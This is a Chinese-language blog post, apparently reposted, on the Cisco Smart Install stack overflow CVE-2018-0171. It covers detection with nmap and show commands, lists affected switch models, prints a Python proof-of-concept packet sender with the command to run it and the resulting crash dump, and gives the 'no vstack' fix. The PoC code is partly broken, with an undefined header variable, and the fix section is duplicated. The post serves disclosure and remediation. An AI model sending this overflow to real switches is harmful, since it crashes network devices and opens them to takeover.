本文共 5866 字,大约阅读时间需要 19 分钟。
0x01前言
在Smart Install Client代码中发现了基于堆栈的缓冲区溢出漏洞,该漏洞***者无需身份验证登录即可远程执行任意代码。cisco Smart Install是一种“即插即用”的配置和图像管理功能,可为新的交换机提供简易的部署。该功能允许用户将思科交换机放置到到任何位置,将其安装到网络中,然后启动,无需其他配置要求。因此它可以完全控制易受***的网络设备。Smart Install是一种即插即用的配置和图像管理的功能,为新型交换机提供良好的图形界面管理。它能使初始化配置过程自动化,并通过当前加载操作系统的镜像提供新的交换机。该功能还可在配置发生变化的时候提供热插热拔的实时备份。需要注意的是,该功能在默认情况下客户端上是启用了的。0x02漏洞描述
思科 IOS 和 IOS-XE 系统 Smart Install Client 代码中存在一处缓冲区栈溢出漏洞(CVE-2018-0171)。***者可以远程向 TCP 4786 端口发送一个恶意数据包,利用该漏洞,触发目标设备的栈溢出漏洞造成设备拒绝服务(DoS)或在造成远程命令执行,***者可以远程控制受到漏洞影响的网络设备。据悉,思科交换器 TCP 4786 端口是默认开放的0x03检查漏洞
1.如果您的思科网络设备开放了TCP 4786端口,则易受到***,为了找到这样的设备,只需通过nmap扫描目标网络。nmap -p T:4786 192.168.1.0/24
2.要检查网络设备是否开放了Smart Install Client客户端功能,以下示例是在显示配置为Smart Install Clien的Cisco Catalyst交换机上的show vstack config命令输出:
复制代码
switch1# show vstack configRole: Client (SmartInstall enabled).switch2# show vstack configCapability: ClientOper Mode: EnabledRole: Client复制代码来自show vstack config命令输出的Role:Client和Oper Mode:Enabled或Role:Client(已启用SmartInstall)信息确认设备上已启用了该功能。3.思科机子上执行命令判断,开放了4786端口即使用了SMI。
复制代码
switch>show tcp brief allTCBLocal Address Foreign Address (state)
0344B794.4786 .* LISTEN
0350A018.443 .* LISTEN
03293634.443 .* LISTEN
03292D9C.80 .* LISTEN
03292504.80 .* LISTEN
复制代码Cisco IOS和iex软件版本检查:复制代码
Router> show versionCisco IOS Software, C2951 Software (C2951-UNIVERSALK9-M), Version 15.5(2)T1, RELEASE SOFTWARE (fc1)
Technical Support:
Copyright (c) 1986-2015 by Cisco Systems, Inc.
Compiled Mon 22-Jun-15 09:32 by prod_rel_team
ios-xe-device# show version
Cisco IOS Software, Catalyst L3 Switch Software (CAT3K_CAA-UNIVERSALK9-M), Version Denali 16.2.1, RELEASE SOFTWARE (fc1)
Technical Support:
Copyright (c) 1986-2016 by Cisco Systems, Inc.
Compiled Sun 27-Mar-16 21:47 by mcpre
复制代码4.如果您不确定您的漏洞是否受到影响,可以使用Cisco的Cisco IOS Software Checker进行检测:
5.使用下面的脚本探测对应IP端口是否确实开放的是思科SMI协议
协议特征可以参见msf扒拉出来的
复制代码
[INFO] Sending TCP probe to targetip:4786
[INFO] Smart Install Client feature active on targetip:4786
[INFO] targetip is affected
复制代码0x04 影响范围
影响设备:
Catalyst 4500 Supervisor EnginesCisco Catalyst 3850 Series SwitchesCisco Catalyst 2960 Series Switches包含部分Smart Install Client的设备也可能受到影响:
Catalyst 4500 Supervisor EnginesCatalyst 3850 SeriesCatalyst 3750 SeriesCatalyst 3650 SeriesCatalyst 3560 SeriesCatalyst 2960 SeriesCatalyst 2975 SeriesIE 2000IE 3000IE 3010IE 4000IE 4010IE 5000SM-ES2 SKUsSM-ES3 SKUsNME-16ES-1G-PSM-X-ES3 SKUs0x05 漏洞验证
以下是此漏洞验证的PoC:复制代码
import socket
import struct
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-t", "--target", dest="target", help="Smart Install Client", default="192.168.1.1") parser.add_option("-p", "--port", dest="port", type="int", help="Port of Client", default=4786) (options, args) = parser.parse_args()
def craft_tlv(t, v, t_fmt='!I', l_fmt='!I'):
return struct.pack(t_fmt, t) + struct.pack(l_fmt, len(v)) + v
def send_packet(sock, packet):
sock.send(packet)
def receive(sock):
return sock.recv()
if name == "main":
print "[*] Connecting to Smart Install Client ", options.target, "port", options.port con = socket.socket(socket.AF_INET, socket.SOCK_STREAM) con.connect((options.target, options.port)) payload = 'BBBB' * 44 shellcode = 'D' * 2048 data = 'A' * 36 + struct.pack('!I', len(payload) + len(shellcode) + 40) + payload tlv_1 = craft_tlv(0x00000001, data) tlv_2 = shellcode pkt = hdr + tlv_1 + tlv_2 print "[*] Send a malicious packet" send_packet(con, pkt) 复制代码
要***交换机,则运行以下命令:
host$ ./smi_ibc_init_discovery_BoF.py-t 192.168.1.1
在交换机上应显示崩溃信息并重新启动:
复制代码
00:10:35 UTC Mon Mar 1 1993: Unexpected exception to CPUvector 1200, PC = 42424240-Traceback= 42424240
Writing crashinfo to flash:/crashinfo_ext/crashinfo_ext_15
=== Flushing messages (00:10:39 UTC Mon Mar 1 1993) === Buffered messages:
...
Queued messages:
Cisco IOS Software, C2960 Software (C2960-LANBASEK9-M), Version 12.2(55)SE11, RELEASE SOFTWARE
(fc3)
Technical Support:
Copyright (c) 1986-2016 by Cisco Systems, Inc.
Compiled Wed 17-Aug-16 13:46 by prod_rel_team
Instruction TLB Miss Exception (0x1200)!
SRR0 = 0x42424240 SRR1 = 0x00029230 SRR2 = 0x0152ACE4 SRR3 = 0x00029230
ESR = 0x00000000 DEAR = 0x00000000 TSR = 0x84000000 DBSR = 0x00000000
CPU Register Context:
Vector = 0x00001200 PC = 0x42424240 MSR = 0x00029230 CR = 0x33000053
LR = 0x42424242 CTR = 0x014D5268 XER = 0xC000006A
R0 = 0x42424242 R1 = 0x02B1B0B0 R2 = 0x00000000 R3 = 0x032D12B4
R4 = 0x000000B6 R5 = 0x0000001E R6 = 0xAA3BEC00 R7 = 0x00000014
R8 = 0x0000001E R9 = 0x00000000 R10 = 0x001BA800 R11 = 0xFFFFFFFF
R12 = 0x00000000 R13 = 0x00110000 R14 = 0x0131E1A8 R15 = 0x02B1B1A8
R16 = 0x02B1B128 R17 = 0x00000000 R18 = 0x00000000 R19 = 0x02B1B128
R20 = 0x02B1B128 R21 = 0x00000001 R22 = 0x02B1B128 R23 = 0x02B1B1A8
R24 = 0x00000001 R25 = 0x00000000 R26 = 0x42424242 R27 = 0x42424242
R28 = 0x42424242 R29 = 0x42424242 R30 = 0x42424242 R31 = 0x42424242
Stack trace:
PC = 0x42424240, SP = 0x02B1B0B0
Frame 00: SP = 0x42424242 PC = 0x42424242
复制代码0x06 漏洞修复
#conf tEnter configuration commands, one per line. End with CNTL/Z.
NSJ-131-6-16-C2960_7(config)#no vstack
NSJ-131-6-16-C2960_7(config)#exit
关键的就是这句 no vstack
再看,端口已经关掉了。
#show tcp brief all
TCB Local Address Foreign Address (state)
075A0088 .443 .* LISTEN
0759F6C8 .443 .* LISTEN
0759ED08 .80 .* LISTEN
0759E348 .80 .* LISTEN
0x06 漏洞危害
可能会导致***者在受影响的设备上导致缓冲区溢出,这可能会产生如下影响:触发设备的重新加载
允许***者在设备上执行任意代码
在受影响的设备上引发无限循环重启,是设备崩溃
0x07 漏洞修复
#conf tEnter configuration commands, one per line. End with CNTL/Z.
NSJ-131-6-16-C2960_7(config)#no vstack
NSJ-131-6-16-C2960_7(config)#exit
关键的就是这句 no vstack
再看,端口已经关掉了。
#show tcp brief all
TCB Local Address Foreign Address (state)
075A0088 .443 .* LISTEN
0759F6C8 .443 .* LISTEN
0759ED08 .80 .* LISTEN
0759E348 .80 .* LISTEN
0x08 参考文献
原文:
转载于:https://blog.51cto.com/laowafang/2095364